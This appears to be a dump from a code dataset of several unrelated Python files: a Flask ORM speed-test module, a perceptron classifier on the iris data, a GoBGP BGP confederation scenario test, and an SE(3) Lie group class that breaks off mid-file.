user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name=request.json['last_name']))
db.session.commit()
return { "updated": True }
class OrmSpeedTest(Command):
user_id = 1
def get_100_rec(self):
customers = SpeedtestCustomer.query.filter().limit(100)
def count_rec(self):
count = SpeedtestCustomer.query.count()
def paginate_100_rec(self):
per_page = 100
page = 1
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
def aggregation(self):
amount = SpeedtestCustomer.query.with_entities(func.avg(SpeedtestCustomer.amount))[0]
def crate_rec(self):
user = AuthUser(
username=uuid.uuid4(),
first_name="speed_test_flask"
)
db.session.add(user)
db.session.commit()
def save_rec(self):
user = AuthUser.query.first()
user.last_name = "speed_test_flask_7"
db.session.merge(user)
db.session.commit()
def update_rec(self):
user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name="speed_test_flask_5"))
db.session.commit()
def run(self):
user = AuthUser.query.first()
rotation = 1000
self.user_id = user.id
print ("select:", timeit.Timer(self.get_100_rec).timeit(rotation))
print ("count:", timeit.Timer(self.count_rec).timeit(rotation))
print ("paginate_100_rec:", timeit.Timer(self.paginate_100_rec).timeit(rotation))
print ("aggregation:", timeit.Timer(self.aggregation).timeit(rotation))
print ("crate_rec:", timeit.Timer(self.crate_rec).timeit(rotation))
print ("save_rec:", timeit.Timer(self.save_rec).timeit(rotation))
print ("update_rec:", timeit.Timer(self.update_rec).timeit(rotation)) | flaskspeed/app/speedtest/views.py | from flask import request
from flask_restplus import Resource
from .models import AuthUser, SpeedtestCustomer
from .schemas import CustomerSchema, UserSchema
from sqlalchemy import func
import random, math
from app import db
import uuid
from flask_script import Command
import timeit
DATA = [
{
"id": 1,
"name": "260861f4-1008-49d3-87ef-dbd32b78fae7",
"amount": 958603672,
"user": {
"id": 27160,
"username": "260861f4-1<PASSWORD>-<PASSWORD>-87ef-<PASSWORD>fae7",
"email": "260861f4-1008-49d3-87ef-dbd32b78fae7"
}
},
{
"id": 2,
"name": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"amount": 505838560,
"user": {
"id": 27161,
"username": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"email": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998"
}
},
{
"id": 3,
"name": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"amount": 590426501,
"user": {
"id": 27162,
"username": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"email": "f6d80e74-e340-49c3-a40b-02d7f1c7f874"
}
},
{
"id": 4,
"name": "72188cda-2901-4e8c-92d2-f6a78a74cb1c",
"amount": 733092617,
"user": {
"id": 27163,
"username": "72188cda-<PASSWORD>-<PASSWORD>",
"email": "72188cda-2901-4e8c-92d2-f6a78a74cb1c"
}
},
{
"id": 5,
"name": "4c6f778b-8f16-489c-bb52-4bea615af711",
"amount": 395133510,
"user": {
"id": 27164,
"username": "4c6f778b-8f16-489c-bb52-4bea615af711",
"email": "4c6f778b-8f16-489c-bb52-4bea615af711"
}
},
{
"id": 6,
"name": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"amount": 4636042,
"user": {
"id": 27165,
"username": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"email": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a"
}
},
{
"id": 7,
"name": "89660999-f64a-4318-b001-696c2fbf7bdb",
"amount": 644680468,
"user": {
"id": 27166,
"username": "89660999-f64a-4318-b<PASSWORD>-<PASSWORD>bdb",
"email": "89660999-f64a-4318-b001-696c2fbf7bdb"
}
},
{
"id": 8,
"name": "a4e5c979-f15c-48fe-b3d5-2885af25e39f",
"amount": 210861397,
"user": {
"id": 27167,
"username": "a4e5c979-f15c-48fe-b3d5-<PASSWORD>",
"email": "a4e5c979-f15c-48fe-b3d5-2885af25e39f"
}
},
{
"id": 9,
"name": "1e95646c-db4b-4465-888a-dd832cfef84c",
"amount": 306301242,
"user": {
"id": 27168,
"username": "1e95646c-db4b-4465-888a-dd832cfef84c",
"email": "1e95646c-db4b-4465-888a-dd832cfef84c"
}
},
{
"id": 10,
"name": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"amount": 890229987,
"user": {
"id": 27169,
"username": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"email": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d"
}
}
]
def gibbs(N=100, thin=100):
x = 0
y = 0
for i in range(N):
for j in range(thin):
x = random.gammavariate(3, 1.0 / (y * y + 4))
y = random.gauss(1.0 / (x + 1), 1.0 / math.sqrt(2 * x + 2))
class SimpleList(Resource):
def get(self):
data = DATA
return data
class HeavyCodeList(Resource):
def get(self):
data = gibbs()
return { "action": "done" }
class SelectList(Resource):
def get(self):
customers = SpeedtestCustomer.query.filter().limit(100)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers)
class Count(Resource):
def get(self):
count = SpeedtestCustomer.query.count()
return { "count": count }
class PaginatedList(Resource):
def get(self, page=1):
per_page = 100
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers.items)
class Aggregation(Resource):
def get(self):
amount = db.session.query(func.avg(SpeedtestCustomer.amount))
return {
"amount": amount,
"random": random.randint(10000,1000000)
}
class Create(Resource):
def post(self):
user = AuthUser(
username=str(uuid.uuid4()),
first_name=str(request.json['first_name'])
)
db.session.add(user)
db.session.commit()
return {"created": True}
class Save(Resource):
def put(self):
user = AuthUser.query.filter_by().first()
user.last_name = request.json['last_name']
db.session.commit()
return { "saved": True }
class Update(Resource):
def put(self):
user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name=request.json['last_name']))
db.session.commit()
return { "updated": True }
class OrmSpeedTest(Command):
user_id = 1
def get_100_rec(self):
customers = SpeedtestCustomer.query.filter().limit(100)
def count_rec(self):
count = SpeedtestCustomer.query.count()
def paginate_100_rec(self):
per_page = 100
page = 1
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
def aggregation(self):
amount = SpeedtestCustomer.query.with_entities(func.avg(SpeedtestCustomer.amount))[0]
def crate_rec(self):
user = AuthUser(
username=uuid.uuid4(),
first_name="speed_test_flask"
)
db.session.add(user)
db.session.commit()
def save_rec(self):
user = AuthUser.query.first()
user.last_name = "speed_test_flask_7"
db.session.merge(user)
db.session.commit()
def update_rec(self):
user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name="speed_test_flask_5"))
db.session.commit()
def run(self):
user = AuthUser.query.first()
rotation = 1000
self.user_id = user.id
print ("select:", timeit.Timer(self.get_100_rec).timeit(rotation))
print ("count:", timeit.Timer(self.count_rec).timeit(rotation))
print ("paginate_100_rec:", timeit.Timer(self.paginate_100_rec).timeit(rotation))
print ("aggregation:", timeit.Timer(self.aggregation).timeit(rotation))
print ("crate_rec:", timeit.Timer(self.crate_rec).timeit(rotation))
print ("save_rec:", timeit.Timer(self.save_rec).timeit(rotation))
print ("update_rec:", timeit.Timer(self.update_rec).timeit(rotation)) | 0.410166 | 0.156041 |
import logging
import argparse
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, accuracy_score
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(filename)s:%(lineno)s - %(message)s')
def load_data():
iris = load_iris()
xs = iris.data
ys = iris.target
idx = ys != 1
xs = xs[idx]
ys = ys[idx] - 1
x_train, x_test, y_train, y_test = train_test_split(xs, ys, test_size=0.2)
logging.info('x_train: %s, y_train: %s, x_test: %s, y_test: %s', x_train.shape, y_train.shape, x_test.shape, y_test.shape)
return x_train, y_train, x_test, y_test
class Perceptron(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.w = np.zeros((input_dim, ))
self.b = 0
self.alpha = alpha
self.x_train = x_train
self.y_train = y_train
def train(self, xi):
x, y = self.x_train[xi], self.y_train[xi]
pred = y * (np.dot(x, self.w) + self.b)
if pred <= 0:
self.w += self.alpha * y * x
self.b += self.alpha * y
def pred(self, x):
logging.info('w: %s', self.w)
return np.dot(x, self.w) + self.b
class PerceptronDual(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.num_train = len(x_train)
self.a = np.zeros((self.num_train, ))
self.b = 0
self.alpha = alpha
self.gram = np.zeros((self.num_train, self.num_train))
self.x_train = x_train
self.y_train = y_train
for i, xi in enumerate(x_train):
for j, xj in enumerate(x_train):
self.gram[i][j] = np.dot(xi, xj) * y_train[i]
def train(self, xi):
y = self.y_train[xi]
s = self.b
for j in range(self.num_train):
s += self.gram[j][xi] * self.a[j]
pred = y * s
if pred <= 0:
self.a[xi] += self.alpha
self.b += self.alpha * y
def pred(self, x):
w = np.sum(self.a.reshape(-1, 1) * self.x_train * self.y_train.reshape(-1, 1), axis=0)
logging.info('w: %s', w)
return np.dot(x, w) + self.b
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='', help="")
parser.add_argument('--alpha', type=float, default=0.01, help="learning rate")
parser.add_argument('--epoch', type=int, default=10, help="epoch")
args = parser.parse_args()
logging.info('args: %s', args)
x_train, y_train, x_test, y_test = load_data()
for i, x in enumerate(x_train[:10]):
print(i, x, y_train[i])
clazz = PerceptronDual if args.mode == 'dual' else Perceptron
model = clazz(x_train, y_train, input_dim=len(x_train[0]), alpha=args.alpha)
for epoch in range(args.epoch):
for i in range(len(x_train)):
model.train(i)
y_pred_v = model.pred(x_test)
y_pred = np.sign(y_pred_v)
acc = accuracy_score(y_test, y_pred)
logging.info('epoch: %03d, accuracy: %s', epoch + 1, acc)
logging.info('report')
p = classification_report(y_test, y_pred)
print(p)
if __name__ == "__main__":
main() | perceptron/p.py | import logging
import argparse
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, accuracy_score
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(filename)s:%(lineno)s - %(message)s')
def load_data():
iris = load_iris()
xs = iris.data
ys = iris.target
idx = ys != 1
xs = xs[idx]
ys = ys[idx] - 1
x_train, x_test, y_train, y_test = train_test_split(xs, ys, test_size=0.2)
logging.info('x_train: %s, y_train: %s, x_test: %s, y_test: %s', x_train.shape, y_train.shape, x_test.shape, y_test.shape)
return x_train, y_train, x_test, y_test
class Perceptron(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.w = np.zeros((input_dim, ))
self.b = 0
self.alpha = alpha
self.x_train = x_train
self.y_train = y_train
def train(self, xi):
x, y = self.x_train[xi], self.y_train[xi]
pred = y * (np.dot(x, self.w) + self.b)
if pred <= 0:
self.w += self.alpha * y * x
self.b += self.alpha * y
def pred(self, x):
logging.info('w: %s', self.w)
return np.dot(x, self.w) + self.b
class PerceptronDual(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.num_train = len(x_train)
self.a = np.zeros((self.num_train, ))
self.b = 0
self.alpha = alpha
self.gram = np.zeros((self.num_train, self.num_train))
self.x_train = x_train
self.y_train = y_train
for i, xi in enumerate(x_train):
for j, xj in enumerate(x_train):
self.gram[i][j] = np.dot(xi, xj) * y_train[i]
def train(self, xi):
y = self.y_train[xi]
s = self.b
for j in range(self.num_train):
s += self.gram[j][xi] * self.a[j]
pred = y * s
if pred <= 0:
self.a[xi] += self.alpha
self.b += self.alpha * y
def pred(self, x):
w = np.sum(self.a.reshape(-1, 1) * self.x_train * self.y_train.reshape(-1, 1), axis=0)
logging.info('w: %s', w)
return np.dot(x, w) + self.b
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='', help="")
parser.add_argument('--alpha', type=float, default=0.01, help="learning rate")
parser.add_argument('--epoch', type=int, default=10, help="epoch")
args = parser.parse_args()
logging.info('args: %s', args)
x_train, y_train, x_test, y_test = load_data()
for i, x in enumerate(x_train[:10]):
print(i, x, y_train[i])
clazz = PerceptronDual if args.mode == 'dual' else Perceptron
model = clazz(x_train, y_train, input_dim=len(x_train[0]), alpha=args.alpha)
for epoch in range(args.epoch):
for i in range(len(x_train)):
model.train(i)
y_pred_v = model.pred(x_test)
y_pred = np.sign(y_pred_v)
acc = accuracy_score(y_test, y_pred)
logging.info('epoch: %03d, accuracy: %s', epoch + 1, acc)
logging.info('report')
p = classification_report(y_test, y_pred)
print(p)
if __name__ == "__main__":
main() | 0.657538 | 0.511656 |
import sys
import time
import unittest
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import BGP_FSM_ESTABLISHED, local
from lib.gobgp import GoBGPContainer
from lib.quagga import QuaggaBGPContainer
class GoBGPTestBase(unittest.TestCase):
def _check_global_rib_first(self, q, prefix, aspath):
route = q.get_global_rib(prefix)[0]
self.assertListEqual(aspath, route['aspath'])
@classmethod
def setUpClass(cls):
# +-----Confederation(AS30)-----+
# AS21 AS20 | +-AS65002-+ +-AS65001-+ | AS10
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | q3 |---| q2 |--+-+-| g1 |-+-----+-| q11 |-+-+--| q1 |
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | | | | | | | |
# | | | | | | | |
# | | | | | | | |
# | | +-----+ | | +-----+ | |
# | | | q22 | | | | q12 | | |
# | | +-----+ | | +-----+ | |
# | +---------+ +---------+ |
# +-----------------------------+
gobgp_ctn_image_name = parser_option.gobgp_image
base.TEST_PREFIX = parser_option.test_prefix
bgp_conf_1 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65002]}}}}
bgp_conf_2 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65001]}}}}
g1 = GoBGPContainer(name='g1', asn=65002, router_id='192.168.2.1',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level,
bgp_config=bgp_conf_2)
q1 = QuaggaBGPContainer(name='q1', asn=10, router_id='1.1.1.1')
q2 = QuaggaBGPContainer(name='q2', asn=20, router_id='2.2.2.2')
q3 = QuaggaBGPContainer(name='q3', asn=21, router_id='3.3.3.3')
q11 = QuaggaBGPContainer(name='q11', asn=65001, router_id='192.168.1.1', bgpd_config=bgp_conf_1)
q12 = QuaggaBGPContainer(name='q12', asn=65001, router_id='192.168.1.2', bgpd_config=bgp_conf_1)
q22 = QuaggaBGPContainer(name='q22', asn=65002, router_id='192.168.2.2', bgpd_config=bgp_conf_2)
ctns = [g1, q1, q2, q3, q11, q12, q22]
cls.initial_wait_time = max(ctn.run() for ctn in ctns)
time.sleep(cls.initial_wait_time)
q1.add_peer(q11, remote_as=30)
q11.add_peer(q1)
q11.add_peer(q12)
q12.add_peer(q11)
g1.add_peer(q11)
q11.add_peer(g1)
g1.add_peer(q22)
q22.add_peer(g1)
g1.add_peer(q2)
q2.add_peer(g1, remote_as=30)
q3.add_peer(q2)
q2.add_peer(q3)
cls.gobgp = g1
cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3, 'q11': q11, 'q12': q12, 'q22': q22}
# test each neighbor state is turned establish
def test_01_neighbor_established(self):
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q11'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q22'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q2'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q1'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q12'])
self.quaggas['q2'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q3'])
def test_02_route_advertise(self):
self.quaggas['q3'].add_route('10.0.0.0/24')
time.sleep(self.initial_wait_time)
routes = []
for _ in range(60):
routes = self.quaggas['q1'].get_global_rib('10.0.0.0/24')
if routes:
break
time.sleep(1)
self.assertFalse(len(routes) == 0)
# Confirm AS_PATH in confederation is removed
self._check_global_rib_first(self.quaggas['q1'], '10.0.0.0/24', [30, 20, 21])
# Confirm AS_PATH in confederation is not removed
self._check_global_rib_first(self.quaggas['q11'], '10.0.0.0/24', [65002, 20, 21])
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [20, 21])
def test_03_best_path(self):
self.quaggas['q1'].add_route('10.0.0.0/24')
routes = []
for _ in range(60):
routes = self.gobgp.get_global_rib('10.0.0.0/24')
if len(routes) == 1:
if len(routes[0]['paths']) == 2:
break
time.sleep(1)
self.assertFalse(len(routes) != 1)
self.assertFalse(len(routes[0]['paths']) != 2)
# In g1, there are two routes to 10.0.0.0/24
# confirm the route from q1 is selected as the best path
# because it has shorter AS_PATH.
# (AS_CONFED_* segments in AS_PATH is not counted)
paths = routes[0]['paths']
self.assertTrue(paths[0]['aspath'], [65001, 10])
# confirm the new best path is advertised
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [65001, 10])
if __name__ == '__main__':
output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
if int(output) is not 0:
print("docker not found")
sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0]) | test/scenario_test/bgp_confederation_test.py |
import sys
import time
import unittest
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import BGP_FSM_ESTABLISHED, local
from lib.gobgp import GoBGPContainer
from lib.quagga import QuaggaBGPContainer
class GoBGPTestBase(unittest.TestCase):
def _check_global_rib_first(self, q, prefix, aspath):
route = q.get_global_rib(prefix)[0]
self.assertListEqual(aspath, route['aspath'])
@classmethod
def setUpClass(cls):
# +-----Confederation(AS30)-----+
# AS21 AS20 | +-AS65002-+ +-AS65001-+ | AS10
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | q3 |---| q2 |--+-+-| g1 |-+-----+-| q11 |-+-+--| q1 |
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | | | | | | | |
# | | | | | | | |
# | | | | | | | |
# | | +-----+ | | +-----+ | |
# | | | q22 | | | | q12 | | |
# | | +-----+ | | +-----+ | |
# | +---------+ +---------+ |
# +-----------------------------+
gobgp_ctn_image_name = parser_option.gobgp_image
base.TEST_PREFIX = parser_option.test_prefix
bgp_conf_1 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65002]}}}}
bgp_conf_2 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65001]}}}}
g1 = GoBGPContainer(name='g1', asn=65002, router_id='192.168.2.1',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level,
bgp_config=bgp_conf_2)
q1 = QuaggaBGPContainer(name='q1', asn=10, router_id='1.1.1.1')
q2 = QuaggaBGPContainer(name='q2', asn=20, router_id='2.2.2.2')
q3 = QuaggaBGPContainer(name='q3', asn=21, router_id='3.3.3.3')
q11 = QuaggaBGPContainer(name='q11', asn=65001, router_id='192.168.1.1', bgpd_config=bgp_conf_1)
q12 = QuaggaBGPContainer(name='q12', asn=65001, router_id='192.168.1.2', bgpd_config=bgp_conf_1)
q22 = QuaggaBGPContainer(name='q22', asn=65002, router_id='192.168.2.2', bgpd_config=bgp_conf_2)
ctns = [g1, q1, q2, q3, q11, q12, q22]
cls.initial_wait_time = max(ctn.run() for ctn in ctns)
time.sleep(cls.initial_wait_time)
q1.add_peer(q11, remote_as=30)
q11.add_peer(q1)
q11.add_peer(q12)
q12.add_peer(q11)
g1.add_peer(q11)
q11.add_peer(g1)
g1.add_peer(q22)
q22.add_peer(g1)
g1.add_peer(q2)
q2.add_peer(g1, remote_as=30)
q3.add_peer(q2)
q2.add_peer(q3)
cls.gobgp = g1
cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3, 'q11': q11, 'q12': q12, 'q22': q22}
# test each neighbor state is turned establish
def test_01_neighbor_established(self):
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q11'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q22'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q2'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q1'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q12'])
self.quaggas['q2'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q3'])
def test_02_route_advertise(self):
self.quaggas['q3'].add_route('10.0.0.0/24')
time.sleep(self.initial_wait_time)
routes = []
for _ in range(60):
routes = self.quaggas['q1'].get_global_rib('10.0.0.0/24')
if routes:
break
time.sleep(1)
self.assertFalse(len(routes) == 0)
# Confirm AS_PATH in confederation is removed
self._check_global_rib_first(self.quaggas['q1'], '10.0.0.0/24', [30, 20, 21])
# Confirm AS_PATH in confederation is not removed
self._check_global_rib_first(self.quaggas['q11'], '10.0.0.0/24', [65002, 20, 21])
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [20, 21])
def test_03_best_path(self):
self.quaggas['q1'].add_route('10.0.0.0/24')
routes = []
for _ in range(60):
routes = self.gobgp.get_global_rib('10.0.0.0/24')
if len(routes) == 1:
if len(routes[0]['paths']) == 2:
break
time.sleep(1)
self.assertFalse(len(routes) != 1)
self.assertFalse(len(routes[0]['paths']) != 2)
# In g1, there are two routes to 10.0.0.0/24
# confirm the route from q1 is selected as the best path
# because it has shorter AS_PATH.
# (AS_CONFED_* segments in AS_PATH is not counted)
paths = routes[0]['paths']
self.assertTrue(paths[0]['aspath'], [65001, 10])
# confirm the new best path is advertised
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [65001, 10])
if __name__ == '__main__':
output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
if int(output) is not 0:
print("docker not found")
sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0]) | 0.267504 | 0.195172 |
import random
import math
from functools import cached_property
import numpy as np
import numpy.typing as npt
from liegroups.base import (
LieGroupBase,
Adjoint,
Jacobian,
OptionalJacobian,
Tangent,
Vector,
eps,
)
from liegroups.so3 import SO3
from liegroups.util import normalize_range, norm, uniform_sampling_n_ball_muller, clip
class SE3(LieGroupBase):
dof = 6
dim = 3
def __init__(
self, x: float, y: float, z: float, theta1: float, theta2: float, theta3: float
):
"""
Initialize the SE2 group element using the angle of rotation in Radians and translation in x and y
Args:
x: the translation distance from the origin on the X axis
y: the translation distance from the origin on the Y axis
z: the translation distance from the origin on the Z axis
theta1: first element of the theta vector
theta2: second element of the theta vector
theta3: third element of theta vector
"""
# Normalize the theta vector so ||theta|| is between (0, PI]
theta = (
theta1,
theta2,
theta3,
)
theta_norm = norm(theta)
normalized_theta_norm = normalize_range(theta_norm, 0, math.pi)
if theta_norm != normalized_theta_norm:
theta = tuple(normalized_theta_norm * t / theta_norm for t in theta)
super().__init__(x, y, z, *theta)
self.so3 = SO3(*theta)
@classmethod
def identity(cls) -> LieGroupBase:
"""
Return the identity of the group
"""
return cls(0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
@classmethod
def random(cls) -> LieGroupBase:
"""
Return the a random element of the group
"""
theta = SO3.random().coeff
return cls(
random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1), *theta,
)
@cached_property
def rotation(self) -> np.ndarray:
"""
Return the matrix representation of the rotation
"""
return self.so3.matrix
@cached_property
def translation(self) -> np.ndarray:
"""
Return the matrix representation of the translation
"""
x = self.coeff[0]
y = self.coeff[1]
z = self.coeff[2]
return np.array([x, y, z])
@cached_property
def matrix(self) -> np.ndarray:
"""
Return the matrix representation of the Lie group element
See Eqs. (152)
"""
matrix = np.identity(self.dim + 1)
matrix[0:3, 0:3] = self.rotation
matrix[0:3, 3] = self.translation
return matrix
@classmethod
def from_matrix(cls, matrix: np.ndarray) -> LieGroupBase:
"""
Construct the Lie group element from its matrix representation
This method does not validate whether or not the matrix is well formed.
See Eqs. (152)
Args:
matrix: matrix representation of the SO2 group element.
Return:
The equivalent SO2 group
"""
theta = SO3.from_matrix(matrix[0:3, 0:3]).coeff
return cls(matrix[0][3], matrix[1][3], matrix[2][3], *theta)
def inverse(self, J_minv_m: OptionalJacobian = None) -> LieGroupBase:
"""Returns the inverse of the this Lie Group Object instance
See Eqs. (3) for general inverse
See Eqs. (154) for inverse specific to the SE2 group
See Eqs. (160) for the Jacobian of the inverse
Args:
J_minv_m: The Jacobian of the inverse with respect to self
Returns:
The inverese of self
"""
if J_minv_m is not None:
assert J_minv_m.shape == (self.dof, self.dof)
J_minv_m[...] = -self.adjoint()
trans_inv = (-self.rotation.T @ self.translation).tolist()
return self.__class__(
trans_inv[0],
trans_inv[1],
trans_inv[2],
-self.coeff[3],
-self.coeff[4],
-self.coeff[5],
)
def _compose(
self,
other: "SE3",
J_mc_ma: OptionalJacobian = None,
J_mc_mb: OptionalJacobian = None,
) -> LieGroupBase:
"""Returns the composition of self and another element of the same Lie group.
See Eqs. (1,2,3,4)
See Eqs. (155) for implementation specific to SE2
See Eqs. (161, 162) for Jacobian implementation
Args:
other: Another element of the same Lie group
J_mc_ma: The Jacobian of the composition wrt self
J_mc_mb: The Jacobian of the composition wrt other
Returns:
The composition of self and other (self @ Other)
"""
Ra = self.rotation
ta = self.translation
Rb = other.rotation
tb = other.translation
if J_mc_ma is not None:
x, y, z = tb.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_mc_ma[3][3] = 1
J_mc_ma[0:3, 0:3] = Rb.T
J_mc_ma[3:6, 3:6] = Rb.T
J_mc_ma[0:3, 3:6] = -Rb.T @ skew
if J_mc_mb is not None:
J_mc_mb[...] = np.identity(self.dof)
m = np.identity(self.dim + 1)
m[0:3, 0:3] = Ra @ Rb
m[0:3, 3] = ta + Ra @ tb
return self.__class__.from_matrix(m)
def act(
self,
vec: Vector,
J_vout_m: OptionalJacobian = None,
J_vout_v: OptionalJacobian = None,
) -> Vector:
"""Perform the action of the group on a point in the vector space
See Eqs. (165, 166, 167)
Args:
vec: A point in the vector space
J_vout_m: Jacobian of the output vector wrt to self
J_vout_v: Jacobian of the output vector wrt to vec
Returns:
A point acted on by the group
"""
if J_vout_m is not None:
x, y, z = vec.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_vout_m[0:3, 0:3] = self.rotation
J_vout_m[0:3, 3:6] = -self.rotation @ skew
if J_vout_v is not None:
J_vout_v[...] = self.rotation
return self.translation + self.rotation @ vec
@staticmethod
def q_matrix(p1, p2, p3, theta1, theta2, theta3) -> npt.NDArray:
theta = norm((theta1, theta2, theta3))
theta_sq = theta * theta
if math.isclose(theta, 0, abs_tol=eps):
# See https://ethaneade.com/lie_groups.pdf Eqs. (158, 160)
a = 0.5
b = 1 / 6 * (1 - theta_sq / 20 * (1 - theta_sq / 42 * (1 - theta_sq / 72)))
c = 1 / 24 * (1 - theta_sq / 30 * (1 - theta_sq / 56 * (1 - theta_sq / 90)))
d = (
1
/ 120
* (1 - theta_sq / 42 * (1 - theta_sq / 72 * (1 - theta_sq / 110)))
)
d = 1 / 2 * (c - 3 * d)
else:
a = 0.5
b = (theta - math.sin(theta)) / (theta_sq * theta)
c = (1 - theta_sq / 2 - math.cos(theta)) / (theta_sq * theta_sq)
d = (
1
/ 2
* (
c
- 3
* (theta - math.sin(theta) - theta_sq * theta / 6)
/ (theta_sq * theta_sq * theta)
)
)
p_x = np.array([[0, -p3, p2], [p3, 0, -p1], [-p2, p1, 0]])
theta_x = np.array(
[[0, -theta3, theta2], [theta3, 0, -theta1], [-theta2, theta1, 0]]
)
theta_x_sq = theta_x @ theta_x
return (
a * p_x
+ b * (theta_x @ p_x + p_x @ theta_x + theta_x @ p_x @ theta_x)
- c * (theta_x_sq @ p_x + p_x @ theta_x_sq - 3 * theta_x @ p_x @ theta_x)
- d * (theta_x @ p_x @ theta_x_sq + theta_x_sq @ p_x @ theta_x)
)
def rjac(self) -> Jacobian:
"""Compute the right jacobian of self
See Eqs. (41) for general computation
See Eqs. (179a) for SE3 specific
Remember J_r(theta) = J_l(-theta) where J_r(theta) and J_l(theta) are the left and right jacobian of the SO3 group
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjac()
jacobian[3:6, 3:6] = self.so3.rjac()
jacobian[0:3, 3:6] = SE3.q_matrix(*(-self.log()).tolist())
return jacobian
def rjacinv(self) -> Jacobian:
"""Compute the inverse of right jacobian of self
See Eqs. (179b)
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjacinv()
jacobian[3:6, 3:6] = self.so3.rjacinv()
jacobian[0:3, 3:6] = (
-self.so3.rjacinv()
@ SE3.q_matrix(*(-self.log()).tolist())
@ self.so3.rjacinv()
)
return jacobian
@classmethod
def exp(cls, tangent: Tangent, J_m_t: OptionalJacobian = None) -> LieGroupBase:
"""Compute the exponential map of the given tagent vector. The dimension of the vector should match the LieGroupBase.dof value
See Eqs. (23)
See Eqs. (173) for conversion between rho and t
Args:
J_m_t: Jacobian of the Lie group element wrt to the given tangent
Returns:
Exponential map of the tagent vector
"""
p1, p2, p3, theta1, theta2, theta3 = tangent.tolist()
so3 = SO3(theta1, theta2, theta3)
x, y, z = (so3.rjac().T @ np.array([p1, p2, p3])).tolist()
m = cls(x, y, z, theta1, theta2, theta3)
if J_m_t is not None:
J_m_t[...] = m.rjac()
return m
def log(self, J_t_m: OptionalJacobian = None) -> Tangent:
"""Compute the tagent vector of the transformation, it is equivalent to the inverse of exponential map
See Eqs. (24)
